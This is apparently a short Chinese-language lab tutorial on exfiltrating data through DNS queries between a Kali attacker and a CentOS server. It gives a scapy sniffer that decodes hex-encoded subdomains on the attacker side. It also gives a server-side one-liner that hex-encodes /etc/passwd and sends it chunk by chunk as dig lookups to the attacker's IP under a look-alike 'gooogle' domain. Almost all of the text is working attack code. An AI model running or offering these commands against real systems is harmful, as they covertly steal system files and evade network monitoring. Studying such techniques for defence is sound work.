环境搭建:
攻击机kali:192.168.159.129
服务器centos:192.168.159.10
在攻击机上运行如下脚本
try:
from scapy.all import *
except:
print("Scapy not found, please install scapy: pip install scapy")
def process_packet(pkt):
if pkt.haslayer(DNS):
domain = pkt[DNS][DNSQR].qname.decode('utf-8')
root_domain = domain.split('.')[1]
if root_domain.startswith('gooogle'):
print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}',
flush=True, end='')
sniff(iface="eth0", prn=process_packet)
在服务器执行如下命令:(在服务器上执行此命令,攻击机上才能有信息出现,才能如上面的图)
xxd -p -c 31 /etc/passwd | while read line; do dig @192.168.159.129 +short +tries=1 +time=1 $line.gooogle.com; done